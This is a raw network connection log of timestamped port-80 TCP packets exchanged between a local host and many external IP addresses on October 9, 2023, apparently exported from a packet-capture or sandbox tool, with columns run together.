                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.258677006 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.258693933 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.258698940 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.258713007 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.258725882 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.258729935 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.258744955 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.258754015 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.258779049 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.303374052 CEST8049719118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.303514004 CEST4971980192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586076975 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586111069 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586127996 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586144924 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586164951 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586174965 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586182117 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586199045 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586215973 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586216927 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586235046 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586251974 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586256981 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586277962 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586292982 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586323023 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586365938 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586374998 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586421013 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586445093 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586457014 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586498976 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586544991 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586585045 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586627007 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586689949 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586728096 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586736917 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586765051 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586770058 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586806059 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586833954 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586870909 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586874962 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586914062 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586939096 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.586982012 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.587007046 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.587044001 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.587050915 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.587085962 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.587110996 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.587153912 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.587212086 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.587260008 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.587280035 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.587325096 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.587349892 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.587393999 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.731259108 CEST4971580192.168.2.3137.118.26.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.913465023 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.913523912 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.913554907 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.913584948 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.913616896 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.913652897 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.913688898 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.913723946 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.913737059 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.913737059 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.913737059 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.913737059 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.913760900 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.913800001 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.913800955 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.913825035 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.913841963 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.913863897 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.913880110 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.913891077 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.913922071 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.914010048 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.914047003 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.914067030 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.914083004 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.914094925 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.914119959 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.914127111 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.914159060 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.914186001 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.914196968 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.914288998 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.914325953 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.914339066 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.914364100 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.914370060 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.914407015 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:09.991765022 CEST4974880192.168.2.3104.21.25.200
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.050987959 CEST4974980192.168.2.377.68.50.105
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.154911041 CEST8049748104.21.25.200192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.241018057 CEST804974339.99.233.155192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.241157055 CEST4974380192.168.2.339.99.233.155
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.280076027 CEST8049748104.21.25.200192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.280107021 CEST8049748104.21.25.200192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.280155897 CEST4974880192.168.2.3104.21.25.200
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.280155897 CEST4974880192.168.2.3104.21.25.200
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.311440945 CEST4975080192.168.2.351.79.51.72
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.315480947 CEST4974880192.168.2.3104.21.25.200
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.356048107 CEST804974977.68.50.105192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.356139898 CEST4974980192.168.2.377.68.50.105
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.356415033 CEST4974980192.168.2.377.68.50.105
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.478841066 CEST8049748104.21.25.200192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.506105900 CEST4975180192.168.2.3104.26.3.124
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.525949955 CEST4975280192.168.2.396.127.180.42
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.546155930 CEST804975051.79.51.72192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.546256065 CEST4975080192.168.2.351.79.51.72
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.546478033 CEST4975080192.168.2.351.79.51.72
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.547379017 CEST8049748104.21.25.200192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.547413111 CEST8049748104.21.25.200192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.547466993 CEST4974880192.168.2.3104.21.25.200
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.547466993 CEST4974880192.168.2.3104.21.25.200
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.586688042 CEST4975380192.168.2.366.94.119.160
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.661662102 CEST804974977.68.50.105192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.661737919 CEST804974977.68.50.105192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.661792040 CEST4974980192.168.2.377.68.50.105
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.669759989 CEST8049751104.26.3.124192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.669842005 CEST4975180192.168.2.3104.26.3.124
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.678869963 CEST4975180192.168.2.3104.26.3.124
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.679768085 CEST4974980192.168.2.377.68.50.105
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.715380907 CEST804973062.122.190.121192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.715464115 CEST4973080192.168.2.362.122.190.121
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.745101929 CEST804975296.127.180.42192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.745281935 CEST4975280192.168.2.396.127.180.42
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.745722055 CEST4975280192.168.2.396.127.180.42
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.772617102 CEST4975480192.168.2.323.227.38.74
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.781025887 CEST804975051.79.51.72192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.781776905 CEST804975051.79.51.72192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.781827927 CEST4975080192.168.2.351.79.51.72
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.782048941 CEST4975080192.168.2.351.79.51.72
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.805270910 CEST804975366.94.119.160192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.805340052 CEST4975380192.168.2.366.94.119.160
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.808542967 CEST4975380192.168.2.366.94.119.160
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.842262983 CEST8049751104.26.3.124192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.877146006 CEST8049751104.26.3.124192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.877172947 CEST8049751104.26.3.124192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.877340078 CEST4975180192.168.2.3104.26.3.124
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.894071102 CEST4975180192.168.2.3104.26.3.124
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.935437918 CEST804975423.227.38.74192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.935630083 CEST4975480192.168.2.323.227.38.74
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.936028004 CEST4975480192.168.2.323.227.38.74
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.964695930 CEST804975296.127.180.42192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.965353966 CEST804975296.127.180.42192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.965447903 CEST4975280192.168.2.396.127.180.42
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.984149933 CEST4975280192.168.2.396.127.180.42
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.984622955 CEST804974977.68.50.105192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.984643936 CEST804974977.68.50.105192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:10.984715939 CEST4974980192.168.2.377.68.50.105
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.016774893 CEST804975051.79.51.72192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.027858973 CEST804975366.94.119.160192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.028762102 CEST804975366.94.119.160192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.028817892 CEST4975380192.168.2.366.94.119.160
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.049671888 CEST4975380192.168.2.366.94.119.160
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.075944901 CEST8049751104.26.3.124192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.075978041 CEST8049751104.26.3.124192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.076077938 CEST4975180192.168.2.3104.26.3.124
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.098633051 CEST804975423.227.38.74192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.125483036 CEST4975580192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.184695959 CEST804975423.227.38.74192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.184806108 CEST4975480192.168.2.323.227.38.74
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.204135895 CEST804975296.127.180.42192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.204205036 CEST4975280192.168.2.396.127.180.42
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.269037008 CEST804975366.94.119.160192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.269135952 CEST4975380192.168.2.366.94.119.160
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.356244087 CEST80497553.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.356321096 CEST4975580192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.358156919 CEST4975580192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.542727947 CEST4975680192.168.2.3195.78.66.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.585362911 CEST4975780192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.587867975 CEST80497553.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.587888956 CEST80497553.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.587927103 CEST4975580192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.587939978 CEST4975580192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.588670015 CEST4975580192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.603683949 CEST4975980192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.604501963 CEST4975880192.168.2.391.210.235.23
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.653146982 CEST4972980192.168.2.3185.15.129.58
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.690327883 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.735208988 CEST8049735185.80.51.179192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.735308886 CEST4973580192.168.2.3185.80.51.179
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.760052919 CEST4976180192.168.2.3210.140.73.39
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.814862967 CEST8049757208.97.178.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.814965010 CEST4975780192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.815256119 CEST4975780192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.818171024 CEST80497553.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.830985069 CEST4976280192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.834145069 CEST80497593.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.834222078 CEST4975980192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.834454060 CEST4975980192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.884989977 CEST8049756195.78.66.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.885071993 CEST4975680192.168.2.3195.78.66.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.885274887 CEST4975680192.168.2.3195.78.66.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.920263052 CEST804975891.210.235.23192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.920437098 CEST4975880192.168.2.391.210.235.23
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:11.920787096 CEST4975880192.168.2.391.210.235.23
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.004692078 CEST8049760154.203.14.100192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.004987001 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.006361961 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.024458885 CEST8049761210.140.73.39192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.024535894 CEST4976180192.168.2.3210.140.73.39
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.024772882 CEST4976180192.168.2.3210.140.73.39
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.044806957 CEST8049757208.97.178.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.045644999 CEST8049757208.97.178.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.045824051 CEST4975780192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.046211004 CEST8049757208.97.178.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.046287060 CEST4975780192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.063270092 CEST4975780192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.063724995 CEST4976380192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.064238071 CEST80497593.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.064286947 CEST80497593.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.064407110 CEST4975980192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.064407110 CEST4975980192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.065083981 CEST4975980192.168.2.33.94.41.167
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.140012980 CEST8049762122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.140100002 CEST4976280192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.141335964 CEST4976280192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.200377941 CEST804973660.43.154.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.200433016 CEST4973680192.168.2.360.43.154.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.227360010 CEST8049756195.78.66.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.229543924 CEST8049756195.78.66.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.229614973 CEST4975680192.168.2.3195.78.66.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.235496998 CEST804975891.210.235.23192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.236637115 CEST804975891.210.235.23192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.236690998 CEST4975880192.168.2.391.210.235.23
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.289068937 CEST8049761210.140.73.39192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.292989016 CEST8049757208.97.178.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.293152094 CEST8049763208.97.178.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.293227911 CEST4976380192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.294698954 CEST80497593.94.41.167192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.296583891 CEST8049761210.140.73.39192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.296638012 CEST4976180192.168.2.3210.140.73.39
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.298825026 CEST4976380192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.450160027 CEST8049762122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.451925039 CEST8049762122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.451947927 CEST8049762122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.451965094 CEST8049762122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.451977968 CEST4976280192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.451983929 CEST8049762122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.452003002 CEST4976280192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.452014923 CEST8049762122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.452054977 CEST8049762122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.452111959 CEST8049762122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.452117920 CEST8049762122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.452147961 CEST8049762122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.452229023 CEST4976280192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.454457045 CEST4976280192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.528460026 CEST8049763208.97.178.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.529160976 CEST8049763208.97.178.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.529211998 CEST4976380192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.529918909 CEST8049763208.97.178.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.529974937 CEST4976380192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.545361996 CEST4976380192.168.2.3208.97.178.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.581332922 CEST4976580192.168.2.313.33.21.22
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.581521988 CEST4976680192.168.2.3165.227.252.190
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.668833971 CEST4976080192.168.2.3154.203.14.100
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:12.684705973 CEST4976780192.168.2.3217.79.184.35
